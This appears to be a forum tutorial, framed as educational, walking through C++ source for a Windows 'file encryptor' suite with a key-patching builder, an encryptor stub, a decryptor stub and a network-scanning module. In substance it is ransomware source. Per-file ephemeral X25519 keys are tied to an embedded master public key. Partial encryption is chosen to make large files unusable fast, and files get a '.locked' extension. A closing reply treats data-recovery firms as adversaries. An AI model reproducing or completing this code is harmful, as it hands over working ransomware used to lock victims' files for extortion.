Article: Example File Encryptor Break Down for Beginners: X25519-HKDF with XChaCha20-Poly1305 AEAD

Remio

Exploring File Encryption with X25519 and XChaCha20-Poly1305
Here we will explore a modern file-encryption design for Windows developed through earlier experiments and articles. This program was made primarily as an educational resource for me to understand these concepts and how they actually work, and will hopefully be useful for beginners too. In the article, we’ll reference to a three-program solution that illustrates the building of the encryptor and decryptor, and the complete encryption and decryption process. The solution consists of three main components:

Builder: Generates a Curve25519 master keypair and patches the keys directly into pre-compiled encryptor and decryptor stubs before writing the executables to disk.
Encryptor: Contains the master public key and encrypts files using ephemeral Curve25519 keypairs combined with XChaCha20-Poly1305 AEAD and the main file encryption logic.
Decryptor: Contains the master private key and reverses the encryption process. It validates file integrity through multiple layers (CRC, Poly1305 MAC).

Github Link: https://github.com/notRemyQ/X25519-XChaCha20-Poly1305-Encryptor-Example

Code:
FileLocker/
├── Builder/
│   ├── builder.cpp                 (Generates master keypair and patches keys into executables)
│   └── curve25519-donna.cpp        (Curve25519 implementation)
├── Encryptor (stub)/
│   ├── Crypto/
│   │   ├── curve25519-donna.cpp    (Key agreement)
│   │   ├── xchacha20.c             (Stream cipher)
│   │   └── poly1305.cpp            (Message authentication)
│   ├── Hash/
│   │   ├── hkdf.cpp                (Key derivation)
│   │   └── sha512.cpp              (Hash function)
│   ├── stub.cpp               (Main encryption logic)
│   └── netscan.cpp                 (Network scanning, not explained here in this article but is not strictly relevant)
└── Decryptor (stub2)/
    ├── Crypto/
    │   ├── curve25519-donna.cpp
    │   ├── xchacha20.c
    │   └── poly1305.cpp
    ├── Hash/
    │   ├── hkdf.cpp
    │   └── sha512.cpp
    ├── stub2.cpp               (Main decryption logic)
    └── netscan.cpp

You'll find I've changed the xchacha20 files slightly to use 8 rounds, this is simply for testing purposes and can be changed back to 20. The complete source code is available at https://github.com/notRemyQ/X25519-XChaCha20-Poly1305-Encryptor-Example.

Classical vs Modern Encryption Systems

When encrypting some file you basically face a fundamental trade-off between two approaches:

Symmetric Encryption: uses the same secret key to both encrypt and decrypt data. It's fast and efficient but has one issue: how do you safely share that key with someone who needs to decrypt the file? If you email it, send it in a message, or store it alongside the encrypted file, an attacker can intercept it and decrypt your data. Without a separate secure channel, there is no safe way to hand the key over.

Asymmetric Encryption: uses two keys: a public key (for encryption) and a private key (for decryption). This solves the key distribution problem because you can freely share your public key without compromising security. However, asymmetric encryption is 100-1000× slower than symmetric encryption simply due to the mathematical complexity involved in the algorithm, making it somewhat impractical for large files or datasets.

To fix this issue, we can combine the convenience of a public-key cryptosystem with the efficiency of a symmetric-key cryptosystem into what's known as a hybrid cryptosystem. First you encrypt the file with a symmetric cipher (such as AES or ChaCha20), and then you encrypt that symmetric key with an asymmetric algorithm (like RSA) so it can be shared securely. Yet there are a few problems.

Firstly, asymmetric operations are slow. RSA private-key operations take on the order of milliseconds on typical hardware, and decryption is far more expensive than encryption. RSA keys are also big (2048-bit keys are 256 bytes, and 4096-bit keys are 512 bytes) compared to Curve25519 keys (32 bytes). RSA also requires padding schemes such as PKCS#1 v1.5 or OAEP, which are easy to implement incorrectly and have caused real vulnerabilities in the past. Additionally, RSA key transport doesn't provide any forward secrecy, meaning that if the private key is ever compromised, every symmetric key that was encrypted to it can be recovered. These limitations are among the reasons many modern systems favor ECC.

The Solution: Elliptic-curve Diffie–Hellman Key Agreement

We still use a hybrid model, but instead of encrypting a symmetric key with RSA, we use a key‑agreement protocol that lets both parties independently compute the same shared secret. The process works like this, say we have two people named Alice and Bob that wish to communicate securely:

Both generate a keypair
  • Alice and Bob each generate a public key and a private key, so they both have an asymmetric keypair.
Exchange each other's public keys
  • Alice keeps her private key and receives Bob's public key.
  • Bob keeps his private key and receives Alice's public key.
Each compute a shared secret
  • Alice combines her private key with Bob's public key to compute a 32-byte shared secret.
  • Bob combines his private key with Alice's public key and gets the same 32-byte shared secret.
They both derive encryption keys
  • Both sides feed the shared secret into a key-derivation function to produce symmetric encryption keys used for fast, efficient data encryption. Even if an attacker captures both public keys, they still cannot derive the shared secret without one of the private keys.

1_TMlN7FLEJcY9EIBmWQuDUQ.png


The builder will start by generating a master Curve25519 keypair and patches keys directly into the encryptor and decryptor binaries. We then embed the public key is in the encryptor, while the decryptor gets the private key. While this approach has operational advantages (no external key files to manage, self-contained executables), the cryptographic principles work the same regardless of how keys are distributed. The master keypair generation follows the Curve25519 specification via:
C++:
BOOL generateMasterKeys() {
    HCRYPTPROV hProv;

    // First we initialize the Windows crypto provider
    if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }

    // Then we can generate 32 random bytes for the private key and apply the clamping requirements
    if (!CryptGenRandom(hProv, 32, master_private)) {
        CryptReleaseContext(hProv, 0);
        return FALSE;
    }

    master_private[0] &= 248;  // Clear the lowest 3 bits (multiple of 8)
    master_private[31] &= 127; // Clear highest bit (< 2^255)
    master_private[31] |= 64;  // Set second highest bit (>= 2^254)

    // Now we derive the public key from private key using scalar multiplication
    curve25519_donna(master_public, master_private, basepoint);

    CryptReleaseContext(hProv, 0);

    return TRUE;
}

First, CryptAcquireContext initializes the Windows CryptoAPI so we can use the CSPRNG. Then we call CryptGenRandom to fill master_private with 32 unpredictable bytes. The key is then clamped according to the Curve25519 spec: clear the lowest three bits, clear the highest bit, and set the second-highest bit. This places the value in a safe range for scalar multiplication. curve25519_donna then derives the public key via scalar multiplication.

C++:
curve25519_donna(master_public, master_private, basepoint);

This multiplies the clamped private key by the Curve25519 basepoint (which is simply the value 9). The result is the public key. This operation is deterministic: given the same private key, you will always get the same public key. However, the reverse operation (computing the private key from the public key) is computationally infeasible (discrete logarithm problem).

Once we have a keypair and the keys are patched, each file is encrypted using a unique ChaCha20 key derived from a fresh ephemeral Curve25519 keypair, rather than the master keypair. The ephemeral private key is destroyed immediately after deriving the symmetric keys, while the ephemeral public key is stored in the file’s metadata to enable decryption. When encrypting a file, the first cryptographic operation generates this ephemeral keypair, which is then used in a key agreement with the master public key to produce a shared secret. From this shared secret, the ChaCha20 encryption key (and Poly1305 authentication key) are derived and used to encrypt the file.
C++:
bool encryptFile(const wchar_t* filepath, HCRYPTPROV hProv) {
    uint8_t ephemeral_private[32] = {0};
    uint8_t ephemeral_public[32] = {0};
    uint8_t shared_secret[32] = {0};
    uint8_t xchacha_key[32] = {0};
    uint8_t poly_key[32] = {0};
    uint8_t nonce[24] = {0};

    // Generate an ephemeral private key
    if (!CryptGenRandom(hProv, 32, ephemeral_private)) {
        return false;
    }

     // Apply Curve25519 clamping (exact same bit operations as master key generation so I'll omit it here)

    // Derive ephemeral public key
    curve25519_donna(ephemeral_public, ephemeral_private, basepoint);
    // Perform X25519 key agreement
    curve25519_donna(shared_secret, ephemeral_private, master_public);

    // etc etc...

    return true;
}

We have four keys in play here: the master public key (embedded in the encryptor, known to everyone), the master private key (embedded in the decryptor, kept secret), the ephemeral private key (temporary, exists in memory only and gets erased), and the ephemeral public key (stored in the encrypted file, not secret but useless alone). During encryption, we compute shared_secret = ephemeral_private × master_public, and during decryption we compute shared_secret = master_private × ephemeral_public. Both operations produce the exact same 32-byte shared secret because scalar multiplications on the curve commute (this is commutativity, not associativity): ephemeral_private × (master_private × basepoint) = master_private × (ephemeral_private × basepoint). Both sides compute the same shared secret using different key combinations.

The decryptor performs this key agreement by reading the ephemeral public key from the file's metadata, then multiplying it by the master private key (which is embedded in the decryptor binary):

C++:
bool decryptFile(const wchar_t* filepath) {FileMetadata meta;uint8_t shared_secret[32];uint8_t xchacha_key[32];uint8_t poly_key[32];

// reading and validate metadata is shown later

// Perform X25519 key agreement using master private key
curve25519_donna(shared_secret, master_private, meta.ephemeral_public);

// Now we have the same shared_secret as the encryptor, continue with decryption.
}

Deriving our encryption keys from a shared secret

C++:
// Continuing in our encryptFile function:
uint8_t okm[64];  // Output Key Material

// derive the xchacha keys using HKDF-SHA512
HKDF_SHA512(
    (const uint8_t*)"filecrypto-v2.2", 15,   // salt (15 bytes)
    shared_secret, 32,  // IKM: Input Key Material
    (const uint8_t*)"key-derivation", 14,   // info/context (14 bytes)
    okm, 64  // OKM: Output (64 bytes)
);

// Now we can split the 64 byte output into our two independent keys
memcpy(xchacha_key, okm, 32);   // First 32 bytes for encryption key
memcpy(poly_key, okm + 32, 32);  // Second 32 bytes for auth key

SecureZeroMemory(okm, 64);

Our HKDF takes four inputs:​
  • Input Key Material (IKM) This is our shared secret from the X25519 key agreement. It's cryptographically strong but we need to process it properly before use.​
  • Salt The salt is a fixed string "filecrypto-v2.2". It is not secret and is the same for every file, so it adds no entropy, and two operations that somehow produced the same shared secret (very unlikely with a proper CSPRNG) would still derive the same keys. What a fixed salt does provide is a label for the extract step that ties the derived keys to this application and version, so the same shared secret used under a different label yields unrelated output.
  • Info/Context The info parameter "key-derivation" provides domain separation allowing the same shared secret to be safely used for deriving multiple independent keys for different purposes. E.g. If we later want to derive additional keys from the same shared secret (for example, a key for metadata encryption), we could use a different info string like "metadata-key" and get cryptographically independent output.​
  • Output Key Material (OKM) We request 64 bytes of output, which HKDF-SHA512 generates deterministically from the inputs. These 64 bytes have high entropy and are cryptographically independent from each other.​

The OKM contains both keys, so we erase it as soon as we've extracted what we need. Later, after encryption completes, we'll also erase the individual keys and the shared secret:
C++:
// At the end of encryptFile function

SecureZeroMemory(ephemeral_private, 32);
SecureZeroMemory(shared_secret, 32);
SecureZeroMemory(xchacha_key, 32);
SecureZeroMemory(poly_key, 32);
SecureZeroMemory(nonce, 24);

The decryptor performs identical key derivation. Because it computes the same shared secret (using master_private × ephemeral_public), and uses the same salt and info parameters, HKDF produces the exact same xchacha_key and poly_key:
C++:
// In decryptFile function
uint8_t okm[64];

HKDF_SHA512(
    (const uint8_t*)"filecrypto-v2.2", 15,   // Same salt
    shared_secret, 32,                      // Same shared secret
    (const uint8_t*)"key-derivation", 14,   // Same info
    okm, 64
);

memcpy(xchacha_key, okm, 32);
memcpy(poly_key, okm + 32, 32);

SecureZeroMemory(okm, 64);

XChaCha20-Poly1305

With our derived keys now we can finally encrypt the file using XChaCha20-Poly1305.

XChaCha20 is our stream cipher: it produces a keystream and XORs it with the plaintext to encrypt data. It works the same way as ChaCha20, but it uses a 24‑byte nonce instead of the usual 12‑byte one. The larger nonce space makes it practical to simply generate a random nonce for every file without worrying about collisions.

C++:
// Generate a random 24‑byte nonce
if (!CryptGenRandom(hProv, 24, nonce)) {
    return false;
}

// Set up the cipher
XChaCha_ctx ctx;
xchacha_keysetup(&ctx, xchacha_key, nonce);

// Encrypt in place
xchacha_encrypt_bytes(&ctx, buffer, buffer, size);
The xchacha_keysetup call initializes the internal state with the derived key and nonce. From there, xchacha_encrypt_bytes just XORs the keystream with the buffer:
C++:
// Encryption
xchacha_encrypt_bytes(&ctx, plaintext, ciphertext, size);

// Decryption operation is the same
xchacha_decrypt_bytes(&ctx, ciphertext, plaintext, size);

Poly1305 is a Message Authentication Code (MAC) that proves the ciphertext hasn't been tampered with. After encrypting the entire file, we compute a Poly1305 tag over all the ciphertext using our separate authentication key:
C++:
BOOL ComputePoly1305MAC(HANDLE hFile, LONGLONG fileSize, uint8_t* poly_key, uint8_t* tag) {
    poly1305_context ctx;
    poly1305_init(&ctx, poly_key);

    // allocate a buffer for file streaming
    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    if (!buffer) return FALSE;

    // Seek to start of file
    LARGE_INTEGER offset;
    offset.QuadPart = 0;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);

    // Stream through the file, updating MAC
    LONGLONG remaining = fileSize;
    while (remaining > 0) {
        DWORD toRead = (remaining > BufferSize) ? BufferSize : (DWORD)remaining;

        if (!ReadFullData(hFile, buffer, toRead)) {
            free(buffer);
            return FALSE;
        }

        poly1305_update(&ctx, buffer, toRead);
        remaining -= toRead;
    }

    // Finalize the MAC computation
    poly1305_finish(&ctx, tag); // Produces 16-byte tag

    free(buffer);
    return TRUE;
}

The poly1305_init function sets up the MAC context with our authentication key. We then stream through the encrypted file in chunks calling poly1305_update for each chunk. This accumulates the MAC calculation without loading the entire file into memory. Finally, poly1305_finish completes the computation and writes the 16-byte authentication tag which is stored in the file metadata. During decryption, we recompute the tag over the ciphertext and compare:
C++:
BOOL VerifyPoly1305MAC(HANDLE hFile, LONGLONG fileSize, uint8_t* poly_key, const uint8_t* expected_tag) {
    poly1305_context ctx;
    poly1305_init(&ctx, poly_key);

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    if (!buffer) return FALSE;

    LARGE_INTEGER offset;
    offset.QuadPart = 0;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
    LONGLONG remaining = fileSize;

    while (remaining > 0) {
        DWORD toRead = (remaining > BufferSize) ? BufferSize : (DWORD)remaining;

        if (!ReadFullData(hFile, buffer, toRead)) {
            free(buffer);
            return FALSE;
        }

        poly1305_update(&ctx, buffer, toRead);
        remaining -= toRead;
    }

    // Compute the tag
    uint8_t computed_tag[16];
    poly1305_finish(&ctx, computed_tag);

    // Constant-time comparison
    BOOL valid = poly1305_verify(computed_tag, expected_tag);

    free(buffer);
    return valid;
}

Some security notes, the poly1305_verify function performs constant-time comparison of the two tags. If they don't match (even a single bit), the file has been tampered with or corrupted, and decryption aborts immediately to prevent chosen-ciphertext attacks. The constant-time comparison is necessary to prevent timing attacks. The encrypt-then-MAC construction is critical because it verifies the Poly1305 tag before decryption. If verification fails, abort without touching the ciphertext. TLS 1.3 and WireGuard use this same approach.

File Metadata Structure and Validation

Each encrypted file gets a 110-byte metadata structure appended at the end:
C++:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;
    uint8_t ephemeral_public[32];
    uint8_t nonce[24];
    uint8_t encryption_mode;
    uint64_t original_size;
    uint8_t poly1305_tag[16];
    uint32_t metadata_checksum;
};
#pragma pack(pop) //eliminates structure padding, ensures the metadata occupies exactly 110 bytes with no gaps between fields - essential for reliable serialization.

Each section here serves a specific purpose:​
  • version (4 bytes): is our program version identifier. This just allows future cryptographic upgrades while maintaining backward compatibility. If we later switch to a different cipher or key agreement protocol, older decryptors can recognize files they can't handle.​
  • ephemeral_public (32 bytes): The ephemeral public key generated during encryption. Our decryptor needs this to derive the shared secret using its master private key.​
  • nonce (24 bytes): The 192-bit random value used with XChaCha20. Nonces don't need to be secret, but they MUST be unique for each encryption operation with the same key.​
  • encryption_mode (1 byte): Indicates which portions of the file were encrypted (full, header-only, or partial), allowing the decryptor to apply the correct decryption pattern.​
  • original_size (8 bytes): The file size before encryption, used to validate the encrypted file's integrity and truncate it back to original size after removing metadata.​
  • poly1305_tag (16 bytes): The Poly1305 MAC computed over the encrypted file contents. This is what prevents tampering;​
  • metadata_checksum (4 bytes): A simple CRC over the metadata itself it enables rapid detection of metadata corruption before expensive cryptographic operations.​
Before attempting decryption we need to validates the metadata:
C++:
BOOL ValidateMetadata(const FileMetadata* meta, LONGLONG encryptedFileSize) {
    // Version check
    if (meta->version != CRYPTO_VERSION) {
        return FALSE;
    }

    // Size sanity checks
    if (meta->original_size == 0) {
        return FALSE;
    }

    if (meta->original_size > (UINT64_MAX - sizeof(FileMetadata))) {
        return FALSE;
    }
    // Verify file size matches metadata claim
    if ((LONGLONG)(meta->original_size + sizeof(FileMetadata)) != encryptedFileSize) {
        return FALSE;
    }

    // Encryption mode validation
    if (meta->encryption_mode < MODE_FULL || meta->encryption_mode > MODE_PARTIAL_20) {
        return FALSE;
    }

    // Verify encryption mode matches file size
    if (meta->original_size <= 1048576) {
        if (meta->encryption_mode != MODE_FULL) return FALSE;
    } else if (meta->original_size <= 5242880) {
        if (meta->encryption_mode != MODE_HEADER) return FALSE;
    } else if (meta->original_size <= 52428800) {
        if (meta->encryption_mode != MODE_PARTIAL_50) return FALSE;
    } else {
        if (meta->encryption_mode != MODE_PARTIAL_20) return FALSE;
    }

    // CRC verification
    uint32_t crc = 0;
    for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
        crc = (crc << 8) ^ ((uint8_t*)meta)[i];
    }

    if (crc != meta->metadata_checksum) {
        return FALSE;
    }

    return TRUE;
}

For validation we go through multiple independent checks:​
  • Version Check: Prevents attempting to decrypt files with incompatible cryptographic schemes.​
  • Size Consistency: Ensures the declared original size matches the actual encrypted file size (accounting for the 110-byte metadata overhead). This catches truncated or corrupted files early.​
  • Encryption Mode Validation: Verifies consistency between file size and the encryption strategy claimed in the metadata. This prevents attacks where an adversary modifies the metadata to trick the decryptor into using an incorrect decryption pattern.​
  • CRC Checksum: Provides fast metadata integrity verification before expensive cryptographic operations. While not especially cryptographically strong, the CRC will quickly detect corruption from file transfer errors or storage failures.​
During decryption, the metadata location is predictable (always the last 110 bytes), so we can seek directly to it:
C++:
// Read metadata from the end of the file
LARGE_INTEGER fileSizeLI;
GetFileSizeEx(hFile, &fileSizeLI);
LONGLONG totalSize = fileSizeLI.QuadPart;

FileMetadata meta;
LARGE_INTEGER metaOffset;
metaOffset.QuadPart = totalSize - sizeof(FileMetadata);

SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);  // move file pointer to metadata position

// now read the metadata
DWORD bytesRead;
ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);

This allows reading and validating metadata without traversing the entire file first. Before we now discuss dynamic encryption it's worth noting that the metadata-at-end design has an interesting side effect: if an encrypted file is truncated during transfer (common on unreliable networks), the metadata remains intact. The CRC check will detect the truncation immediately without requiring expensive MAC computation over a potentially large file. Note this isn't an actual design goal, but came naturally from placing metadata last.

Dynamic Encryption Techniques
Why encrypt the entire file? For a big data set for example, encrypting every byte takes time. But if we only encrypt strategic portions, enough to render the file useless, this is much faster. Rather than encrypting every byte of every file we can just strategic portions that render the file completely unusable while processing it much faster.

The strategy selection is deterministic and much the same as I use in previous articles:
C++:
enum EncryptionMode {
    MODE_FULL = 1,  // Encrypt entire file
    MODE_HEADER = 2,  // Encrypt the first 1MB only
    MODE_PARTIAL_50 = 3, // Encrypt 5×10% chunks
    MODE_PARTIAL_20 = 4  // Encrypt 3 ×10% chunks
};

EncryptionMode mode;
if (fileSize <= 1048576)    // <=1MB
    mode = MODE_FULL;
else if (fileSize <= 5242880)  // <= 5MB
    mode = MODE_HEADER;
else if (fileSize <= 52428800)  //<= 50MB
    mode = MODE_PARTIAL_50;
else   // > 50MB
    mode = MODE_PARTIAL_20;
  • MODE_FULL encrypts the entire file and is used for files under 1MB. Since these files are already small (documents, images, configuration files), the performance cost is negligible, and full encryption provides maximum security.​
  • MODE_HEADER encrypts only the first 1MB of medium files (1-5MB). Many file formats store metadata in their headers: databases have schema information, media files have codec data, compressed archives have file indexes. Corrupting just the header renders these files completely unopenable.​
  • MODE_PARTIAL_50 applies to files between 5MB and 50MB, encrypting five separate 10% chunks distributed evenly across the file.​
  • MODE_PARTIAL_20 handles very large files (over 50MB) by encrypting only three 10% chunks (30% total). For a 1GB file, this means processing 300MB instead of the entire gigabyte (3× faster), yet the file is thoroughly corrupted.​
The region calculation for partial modes:
C++:
BOOL CalculateRegions(LONGLONG fileSize, EncryptionMode mode,
                      EncryptionRegion* regions, int* regionCount) {
    *regionCount = 0;

    switch (mode) {
        case MODE_FULL:
            regions[0].start = 0;
            regions[0].size = fileSize;
            *regionCount = 1;
            return TRUE;

        case MODE_HEADER:
            regions[0].start = 0;
            regions[0].size = min(1048576LL, fileSize); // encrypt up to 1 MB
            *regionCount = 1;
            return TRUE;

        case MODE_PARTIAL_50: {
            LONGLONG partSize = (fileSize * 10) / 100; // 10% chunks
            LONGLONG stepSize = partSize; // Equal spacing

            for (int i = 0; i < 5; i++) {
                LONGLONG start = i * (partSize + stepSize);
                if (start >= fileSize) break;

                regions[i].start = start;
                regions[i].size = min(partSize, fileSize - start);
                (*regionCount)++;
            }
            return (*regionCount > 0);
        }

        case MODE_PARTIAL_20: {
            LONGLONG partSize = (fileSize * 10) / 100; // 10% chunks
            LONGLONG totalParts = partSize * 3;  // 30% of  total

            if (totalParts >= fileSize) {
                // File too small for spacing, encrypt it all
                regions[0].start = 0;
                regions[0].size = fileSize;
                *regionCount = 1;
                return TRUE;
            }
            LONGLONG stepSize = (fileSize - totalParts) / 2; // Distribute the  3 chunks the across file

            for (int i = 0; i < 3; i++) {
                LONGLONG start = (i == 0) ? 0 : (partSize + stepSize) * i;
                if (start >= fileSize) break;

                regions[i].start = start;
                regions[i].size = min(partSize, fileSize - start);
                (*regionCount)++;
            }
            return (*regionCount > 0);


        }
    }
    return FALSE;
}

For MODE_PARTIAL_50, the algorithm creates five regions of 10% each with equal spacing. This distributes encryption evenly: beginning, early-middle, center, late-middle, and end. Regardless of where useful data is located, some portion will be encrypted.

Each calculated region is then encrypted independently:

C++:
BOOL EncryptRegion(HANDLE hFile, LPBYTE Buffer, XChaCha_ctx* ctx,
                   LONGLONG startPos, LONGLONG regionSize) {
    if (regionSize <= 0) return FALSE;

    // Seek to region start
    LARGE_INTEGER offset;
    offset.QuadPart = startPos;
    if (!SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN)) {
        return FALSE;
    }

    LONGLONG totalProcessed = 0;

    while (totalProcessed < regionSize) {
        DWORD chunkSize = (regionSize - totalProcessed > BufferSize) ?
                          BufferSize : (DWORD)(regionSize - totalProcessed);

        // Read plaintext chunk
        if (!ReadFullData(hFile, Buffer, chunkSize)) {
            return FALSE;
        }

        xchacha_encrypt_bytes(ctx, Buffer, Buffer, chunkSize); // Encrypt in-place

        // Write ciphertext back to same position
        offset.QuadPart = startPos + totalProcessed;
        if (!SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN)) {
            return FALSE;
        }

        if (!WriteFullData(hFile, Buffer, chunkSize)) {
            return FALSE;
        }

        totalProcessed += chunkSize;
    }

    return TRUE;
}

All regions use the same XChaCha20 contextwhich maintains stream cipher state

C++:
BOOL EncryptFileRegions(HANDLE hFile, LPBYTE Buffer, uint8_t* key, uint8_t* nonce,
                        EncryptionRegion* regions, int regionCount) {
    // Single context for all regions
    XChaCha_ctx ctx;
    xchacha_keysetup(&ctx, key, nonce);

    // Encrypt each region with the same context
    for (int i = 0; i < regionCount; i++) {
        if (!EncryptRegion(hFile, Buffer, &ctx, regions[i].start, regions[i].size)) {
            SecureZeroMemory(&ctx, sizeof(ctx));
            return FALSE;
        }
    }

    SecureZeroMemory(&ctx, sizeof(ctx));
    return TRUE;
}

The takeaway here is that partial encryption doesn't reduce the cryptographic strength of what is encrypted. Those portions are just as secure as full file encryption. What changes is the completeness of data destruction. File carving tools may be able to recover some unencrypted portions, depending on the type of files. However, in practical scenarios, partial encryption achieves the same operational impact as full encryption. A database with an encrypted header cannot be opened, a video file with encrypted chunks cannot be played and an archive with encrypted portions cannot be extracted. The file is effectively destroyed from a usability perspective, while encryption speed is dramatically improved.

The Poly1305 MAC is computed over the entire file (both encrypted and unencrypted regions), ensuring that an attacker cannot modify even the unencrypted portions without detection.

Complete Encryption Process

C++:
bool encryptFile(const wchar_t* filepath, HCRYPTPROV hProv) {
    // Step 1: Initialize all cryptographic material
    uint8_t ephemeral_private[32] = {0};
    uint8_t ephemeral_public[32] = {0};
    uint8_t shared_secret[32] = {0};
    uint8_t xchacha_key[32] = {0};
    uint8_t poly_key[32] = {0};
    uint8_t nonce[24] = {0};

    // Generate ephemeral keypair
    if (!CryptGenRandom(hProv, 32, ephemeral_private)) {
        return false;
    }

    // Clamp the keys (shown earlier)

    // Derive ephemeral public key
    curve25519_donna(ephemeral_public, ephemeral_private, basepoint);

    //Perform the X25519 key agreement
    curve25519_donna(shared_secret, ephemeral_private, master_public);

    //Derive encryption and authentication keys, extract(shared_secret, salt) + Expand(info) > enc_key || auth_key
    uint8_t okm[64];
    HKDF_SHA512((const uint8_t*)"filecrypto-v2.2", 15,
                shared_secret, 32,
                (const uint8_t*)"key-derivation", 14,
                okm, 64);
    memcpy(xchacha_key, okm, 32);
    memcpy(poly_key, okm + 32, 32);
    SecureZeroMemory(okm, 64);

    // Generate random nonce
    if (!CryptGenRandom(hProv, 24, nonce)) {
        SecureZeroMemory(ephemeral_private, 32);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(xchacha_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }

    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }

    // Get the file size
    LARGE_INTEGER fileSizeLI;
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG fileSize = fileSizeLI.QuadPart;

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);

    // Determine encryption mode
    EncryptionMode mode;
    if (fileSize <= 1048576) mode = MODE_FULL;
    else if (fileSize <= 5242880) mode = MODE_HEADER;
    else if (fileSize <= 52428800) mode = MODE_PARTIAL_50;
    else mode = MODE_PARTIAL_20;

    // calculate the regions to encrypt
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(fileSize, mode, regions, &regionCount);

    // Encrypt the regions
    BOOL success = EncryptFileRegions(hFile, buffer, xchacha_key, nonce,
                                      regions, regionCount);

    //  Compute Poly1305 MAC
    FileMetadata meta = {0};
    ComputePoly1305MAC(hFile, fileSize, poly_key, meta.poly1305_tag);

    // Fill out the metadata structure
    meta.version = CRYPTO_VERSION;
    memcpy(meta.ephemeral_public, ephemeral_public, 32);
    memcpy(meta.nonce, nonce, 24);
    meta.encryption_mode = (uint8_t)mode;
    meta.original_size = (uint64_t)fileSize;

    // Calculate metadata CRC
    uint32_t crc = 0;
    for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
        crc = (crc << 8) ^ ((uint8_t*)&meta)[i];
    }
    meta.metadata_checksum = crc;

    // Append metadata to file
    LARGE_INTEGER endPos;
    endPos.QuadPart = 0;
    SetFilePointerEx(hFile, endPos, NULL, FILE_END);
    DWORD bytesWritten;
    WriteFile(hFile, &meta, sizeof(meta), &bytesWritten, NULL);

    CloseHandle(hFile);

    wchar_t newPath[MAX_PATH];
    wcscpy_s(newPath, MAX_PATH, filepath);
    wcscat_s(newPath, MAX_PATH, L".locked"); // add the custom extension
    MoveFileW(filepath, newPath);

    SecureZeroMemory(ephemeral_private, 32);
    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(xchacha_key, 32);
    SecureZeroMemory(poly_key, 32);
    SecureZeroMemory(nonce, 24);

    free(buffer);

    return true;
}

The decryption workflow mirrors this process in reverse, with authentication verification acting as a critical gate before any data is decrypted:
C++:
bool decryptFile(const wchar_t* filepath) {
    // 1: Open the encrypted file
    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }


    LARGE_INTEGER fileSizeLI;  // Read file size
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG encryptedSize = fileSizeLI.QuadPart;

    // Read the metadata from end of file
    FileMetadata meta;
    LARGE_INTEGER metaOffset;
    metaOffset.QuadPart = encryptedSize - sizeof(FileMetadata);
    SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);
    DWORD bytesRead;
    ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);

    // Validate metadata
    if (!ValidateMetadata(&meta, encryptedSize)) {
        CloseHandle(hFile);
        return false;
    }

    // Perform X25519 key agreement using master private key
    uint8_t shared_secret[32];
    curve25519_donna(shared_secret, master_private, meta.ephemeral_public);

    // Derive encryption and authentication keys (same HKDF as encryption)

    //verify Poly1305 MAC BEFORE decryption
    if (!VerifyPoly1305MAC(hFile, meta.original_size, poly_key, meta.poly1305_tag)) {
        // MAC verification failed - file has been tampered with or corrupted
        CloseHandle(hFile);
     // if it fails, we immediately abort without touching the ciphertext. This prevents chosen-ciphertext attacks

        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(xchacha_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }

    // Calculate decryption regions
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(meta.original_size, (EncryptionMode)meta.encryption_mode,
                     regions, &regionCount);

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);

    // Decrypt the regions
    BOOL success = EncryptFileRegions(hFile, buffer, xchacha_key, meta.nonce,
                                      regions, regionCount);

    LARGE_INTEGER newSize;
    newSize.QuadPart = meta.original_size;
    SetFilePointerEx(hFile, newSize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);

    CloseHandle(hFile);

    // Remove extension
    wchar_t newPath[MAX_PATH];
    wcscpy_s(newPath, MAX_PATH, filepath);
    size_t len = wcslen(newPath);
    if (len > 7 && wcscmp(newPath + len - 7, L".locked") == 0) {
        newPath[len - 7] = L'\0';
        MoveFileW(filepath, newPath);
    }

    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(xchacha_key, 32);
    SecureZeroMemory(poly_key, 32);

    free(buffer);
    return true;
}
}

Further Reading

As with any program, it is best to set up a sandbox or virtual machine and experiment with the code yourself, since there is too much to cover in one place. I tried to focus on the concepts that are most important to understanding the encryption design, so I hope you found it useful and interesting, especially if these ideas were new to you.
Some resources for exploring the concepts further are listed below:
 
I never understood why some compute a MAC for each file. The cryptographic threat model is different here, CCA's require a decryption oracle to gain any information. If an attacker (here, a data recovery company) were in this position, they'd already have the decryptor with the private key embedded :P This is just extra processing power being wasted when efficiency is critical.

Props on using ECC however. Way faster than basically all RSA key sizes that most people use. Is there a noticeable speed difference considering HKDF tends to be pretty slow?
 

